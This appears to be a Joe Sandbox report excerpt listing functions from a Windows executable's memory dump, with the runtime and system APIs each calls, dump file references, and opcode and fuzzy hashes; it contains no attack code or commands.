Function 00007FF70E7B21D0 Relevance: 3.0, APIs: 2, Instructions: 21COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00007FF70E7B2200

Part of subcall function 00007FF70E7B2F7C: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF70E7B2F85

Concurrency::cancel_current_task.LIBCPMT ref: 00007FF70E7B2206

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: Concurrency::cancel_current_task$std::bad_alloc::bad_alloc
String ID:
API String ID: 1173176844-0
Opcode ID: c507040392a2377e4895e65205c3b95c5fe2146e3485fc393c80d7c2ffdcaf26
Instruction ID: f4769d952d596a59333f279b46bb87cbeab4fec44f38ec33b792a34b7ff7c68e
Opcode Fuzzy Hash: c507040392a2377e4895e65205c3b95c5fe2146e3485fc393c80d7c2ffdcaf26
Instruction Fuzzy Hash: D0E0E240E0B18B46FD2832669D263F581404F7D3B0ED87B30EEBE486E7AF1CA4928130

Function 00007FF70E7BD90C Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlFreeHeap.NTDLL ref: 00007FF70E7BD922
GetLastError.KERNEL32 ref: 00007FF70E7BD934

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 7829e02dcbd74b51c5e196648e5aad52518f68633834b7095f7e5950a32ae739
Instruction ID: 6b2a488b9fb11e33dd4a3eb0c8e3ca29b797dd46a5a7e40d4b319c64893f681a
Opcode Fuzzy Hash: 7829e02dcbd74b51c5e196648e5aad52518f68633834b7095f7e5950a32ae739
Instruction Fuzzy Hash: 5CE0E651E0950346FF287BB2DC452B592959FAC755F846034CA4D86352EF3CA5C58621

Function 00007FF70E7833E4 Relevance: 1.8, APIs: 1, Instructions: 328COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E78388C

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: 8948bb9802c6c0987d886fae829bf96634841c4c74bd64b8e97cfea881f89bd5
Instruction ID: c71a02c81e34e68edf6bd4cb02aacb2e0de3bb1cc7264f9fdd5cb282d9ae821a
Opcode Fuzzy Hash: 8948bb9802c6c0987d886fae829bf96634841c4c74bd64b8e97cfea881f89bd5
Instruction Fuzzy Hash: A4D1DC72B4868165EB28AB29DF402BCE7A1FF29F84F841035CB5D077A5CF38E4618321

Function 00007FF70E795294 Relevance: 1.7, APIs: 1, Instructions: 198COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E79551B

Part of subcall function 00007FF70E7A13F4: CompareStringW.KERNEL32 ref: 00007FF70E7A145A

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: CompareString_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1017591355-0
Opcode ID: 60054bf23714923d6cf658706c57d8570bb270d346a0b8b9a17da1f048c8cd6a
Instruction ID: 8758d7300f16198b2a65ee142c7f5ab3463ac78f502db82102e4c3e3ffb9b6e3
Opcode Fuzzy Hash: 60054bf23714923d6cf658706c57d8570bb270d346a0b8b9a17da1f048c8cd6a
Instruction Fuzzy Hash: 55610411E0C66781FAA6BA35DC1527EE291AF4CBD4FD46131DE4D06AE5EF6CE4428230

Function 00007FF70E7A1870 Relevance: 1.7, APIs: 1, Instructions: 172COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF70E79E948: ReleaseSemaphore.KERNEL32 ref: 00007FF70E79E974
Part of subcall function 00007FF70E79E948: CloseHandle.KERNELBASE ref: 00007FF70E79E993
Part of subcall function 00007FF70E79E948: DeleteCriticalSection.KERNEL32 ref: 00007FF70E79E9AA
Part of subcall function 00007FF70E79E948: CloseHandle.KERNEL32 ref: 00007FF70E79E9B7

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7A1ACB

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: CloseHandle$CriticalDeleteReleaseSectionSemaphore_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 904680172-0
Opcode ID: 7dd4c45c898d1fc3c125baa466fe89dc4e149350440c7c1a3107608e29ab7dcf
Instruction ID: b452b3eb869834dd720a795bbe720b4c5a9eb0ecf02d5623462b6a340dc56e8e
Opcode Fuzzy Hash: 7dd4c45c898d1fc3c125baa466fe89dc4e149350440c7c1a3107608e29ab7dcf
Instruction Fuzzy Hash: 5D6182A2716685A1FE08EF65D9541BCB365FF88B90FD85232D76D07AD2CF28E461C310

Function 00007FF70E78EC9C Relevance: 1.6, APIs: 1, Instructions: 145COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E78EEB8

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: 2f83e6df9ab7224275e60499f17cd5cc3bb417b2ed89fe698c193226d29eb46c
Instruction ID: 53c8c854e5fd6f3452d42711cdd0071bbfd4c71726d7d714a68706494faf61f1
Opcode Fuzzy Hash: 2f83e6df9ab7224275e60499f17cd5cc3bb417b2ed89fe698c193226d29eb46c
Instruction Fuzzy Hash: 7851B062A4868290FA14BB25ED443A9A751FF9DBD4FC42236EE5D07396CF3DE485C320

Function 00007FF70E78E7A8 Relevance: 1.6, APIs: 1, Instructions: 118COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF70E793EC8: FindClose.KERNEL32(?,?,00000000,00007FF70E7A0811), ref: 00007FF70E793EFD

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E78E993

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: CloseFind_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1011579015-0
Opcode ID: 7ccb79097edba5c9ff264a6ea3acda2e11d4279ec26602cbe1bb149cda34522a
Instruction ID: e129228c0406bf607f44678296d7e59df79943206b26fe3b4866fd951c7e4331
Opcode Fuzzy Hash: 7ccb79097edba5c9ff264a6ea3acda2e11d4279ec26602cbe1bb149cda34522a
Instruction Fuzzy Hash: A2519122A4868681FB60EF29DD4537DA361FFA8B84F842136EA8D477A5DF2CD441C321

Function 00007FF70E791794 Relevance: 1.6, APIs: 1, Instructions: 115COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E79187D

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: 35ea3b04d8214deea48c115844c26589502cb7cbcbac9db44318e90ece9789cf
Instruction ID: 485d9ab392ad7a27b2406ce90ce9a9f247987ba9f1ce7140b0c6f12c63506b17
Opcode Fuzzy Hash: 35ea3b04d8214deea48c115844c26589502cb7cbcbac9db44318e90ece9789cf
Instruction Fuzzy Hash: FF41EA62B19A8241EA14AA27EE40379E251FF48FD0FC59535EE4C47F5ADF7CD4A18300

Function 00007FF70E792F58 Relevance: 1.6, APIs: 1, Instructions: 100COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7930C8

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: 79c0921cd87fe934e762e48f5845e8be846b4b6500caa7e1addc831544741880
Instruction ID: 5a0269969b75344211106c6437c8dca584048144c7ebaef84b37f3165c27a460
Opcode Fuzzy Hash: 79c0921cd87fe934e762e48f5845e8be846b4b6500caa7e1addc831544741880
Instruction Fuzzy Hash: 40410822A18B4190EE14BB39F945379A362EF5DBD8F942235EA5D077A9DF3CD4418320

Function 00007FF70E7BBDF8 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF70E7BBE20

Part of subcall function 00007FF70E7BBFB0: GetModuleHandleExW.KERNEL32 ref: 00007FF70E7BBFD0
Part of subcall function 00007FF70E7BBFB0: GetProcAddress.KERNEL32 ref: 00007FF70E7BBFE6
Part of subcall function 00007FF70E7BBFB0: FreeLibrary.KERNEL32 ref: 00007FF70E7BC00B

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: HandleModule$AddressFreeLibraryProc
String ID:
API String ID: 3947729631-0
Opcode ID: 5b4d6432c9ab27f48bf344f41163fa66ca8822e5b5ed34cf2c0174bd429b5c6d
Instruction ID: 2d771986d4394e70e6857ab8354fec3b4aef42a1a992445fa5c63c101c348954
Opcode Fuzzy Hash: 5b4d6432c9ab27f48bf344f41163fa66ca8822e5b5ed34cf2c0174bd429b5c6d
Instruction Fuzzy Hash: 2041B421E1865386FB18FB11DC50278E261AF6CB44FC4643ADE8E976A1DF3DE841C761

Function 00007FF70E78129C Relevance: 1.6, APIs: 1, Instructions: 73COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00007FF70E781396

Part of subcall function 00007FF70E781F80: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF70E781F89

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: Concurrency::cancel_current_taskstd::bad_alloc::bad_alloc
String ID:
API String ID: 680105476-0
Opcode ID: 8615e64c65e08c4765cb9fe696173ca1d24e70e0804716bd186f62c3c2783a0a
Instruction ID: 285cc38611731f5dc0b0ed8f5d49a7650951f1047e8106339bfae1377a5f4375
Opcode Fuzzy Hash: 8615e64c65e08c4765cb9fe696173ca1d24e70e0804716bd186f62c3c2783a0a
Instruction Fuzzy Hash: EC21A122A4A25185EA14AB51EA00279A354EF29BF0FE81B30DE7D47FD1DF7CE0928310

Function 00007FF70E7C124C Relevance: 1.6, APIs: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF70E7C1280

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 9dd5a9e84c18447e56e2265fa04046f11d37b96b7f5b774ce3305aa6458b3f00
Instruction ID: 0686bc1a04258db0d59e03b4a84c6b530ac056aacde70a3496bcedf558d17d2f
Opcode Fuzzy Hash: 9dd5a9e84c18447e56e2265fa04046f11d37b96b7f5b774ce3305aa6458b3f00
Instruction Fuzzy Hash: A6114F36A1D64286F710AB50DC40639F2A9FF4C394FD46139E68D97796DF3CE8508720

Function 00007FF70E7AFC68 Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF70E7AF0A4: GetDlgItem.USER32 ref: 00007FF70E7AF0E3
Part of subcall function 00007FF70E7AF0A4: ShowWindow.USER32 ref: 00007FF70E7AF109
Part of subcall function 00007FF70E7AF0A4: SendMessageW.USER32 ref: 00007FF70E7AF11E
Part of subcall function 00007FF70E7AF0A4: SendMessageW.USER32 ref: 00007FF70E7AF136
Part of subcall function 00007FF70E7AF0A4: SendMessageW.USER32 ref: 00007FF70E7AF157
Part of subcall function 00007FF70E7AF0A4: SendMessageW.USER32 ref: 00007FF70E7AF173
Part of subcall function 00007FF70E7AF0A4: SendMessageW.USER32 ref: 00007FF70E7AF1B6
Part of subcall function 00007FF70E7AF0A4: SendMessageW.USER32 ref: 00007FF70E7AF1D4
Part of subcall function 00007FF70E7AF0A4: SendMessageW.USER32 ref: 00007FF70E7AF1E8
Part of subcall function 00007FF70E7AF0A4: SendMessageW.USER32 ref: 00007FF70E7AF212
Part of subcall function 00007FF70E7AF0A4: SendMessageW.USER32 ref: 00007FF70E7AF22A

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7AFD03

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: MessageSend$ItemShowWindow_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1587882848-0
Opcode ID: 547a288419434c71f498dd61c948c2c3518c924996789682ab92213e3808854e
Instruction ID: a6582476b5f7672c3855ec3bce530f7aa0ac447a7dae1cbbe03a349675876fd5
Opcode Fuzzy Hash: 547a288419434c71f498dd61c948c2c3518c924996789682ab92213e3808854e
Instruction Fuzzy Hash: 4F01DB62B1968541ED24B725D84537EA311EFDD794F902331EADC077D6DF2CE1408714

Function 00007FF70E783AD8 Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E783B6C

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: 454a1fcff6e1850c8b97cdd7684a735fd34d2cefc8bc4c1965818da2daadb151
Instruction ID: 5b445d1b2e933186eac6753ffa7fb36c5eefcc53240c35098dc7c6473f62c066
Opcode Fuzzy Hash: 454a1fcff6e1850c8b97cdd7684a735fd34d2cefc8bc4c1965818da2daadb151
Instruction Fuzzy Hash: 2D0184A2E18BC551EA15A728E845269B361FFDDB94FC06332E6DC07BA5DF2CE4408714

Function 00007FF70E7B1558 Relevance: 1.5, APIs: 1, Instructions: 38COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00007FF70E7B1604: GetModuleHandleW.KERNEL32(?,?,?,00007FF70E7B1573,?,?,?,00007FF70E7B192A), ref: 00007FF70E7B162B

DloadProtectSection.DELAYIMP ref: 00007FF70E7B15C9

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: DloadHandleModuleProtectSection
String ID:
API String ID: 2883838935-0
Opcode ID: 902d746097657f35995c40355b3f554eba39218e3fb79a70aefbb70b68ceb6fd
Instruction ID: 1d0c05f43da55ddddd3127740ae98a09af0bde117f4a42306bd253d04b0d76b5
Opcode Fuzzy Hash: 902d746097657f35995c40355b3f554eba39218e3fb79a70aefbb70b68ceb6fd
Instruction Fuzzy Hash: 2711BA60D0960781FB68BB05EC953B1A350AF2C34CFE82434D94E463A1EF3CA995A632

Function 00007FF70E793EC8 Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF70E7940BC: FindFirstFileW.KERNELBASE ref: 00007FF70E79410B
Part of subcall function 00007FF70E7940BC: FindFirstFileW.KERNELBASE ref: 00007FF70E79415E
Part of subcall function 00007FF70E7940BC: GetLastError.KERNEL32 ref: 00007FF70E7941AF

FindClose.KERNEL32(?,?,00000000,00007FF70E7A0811), ref: 00007FF70E793EFD

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: Find$FileFirst$CloseErrorLast
String ID:
API String ID: 1464966427-0
Opcode ID: b8896e383a5d1dcda19e37a11711c970bf4128f41c8ad41a5c5cc42cc5e45b14
Instruction ID: a619e7a79f05814940cca8322a7fc3121a20b4f50bdbe675b7cdef8f2439230a
Opcode Fuzzy Hash: b8896e383a5d1dcda19e37a11711c970bf4128f41c8ad41a5c5cc42cc5e45b14
Instruction Fuzzy Hash: 72F0AF6290828195EA14BB75E900279B7619F1EBB4F582379EA3D072C7CF28D4848765

Function 00007FF70E79273C Relevance: 1.5, APIs: 1, Instructions: 18fileCOMMON

Download Yara Rule

APIs

SetEndOfFile.KERNELBASE ref: 00007FF70E792755

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: File
String ID:
API String ID: 749574446-0
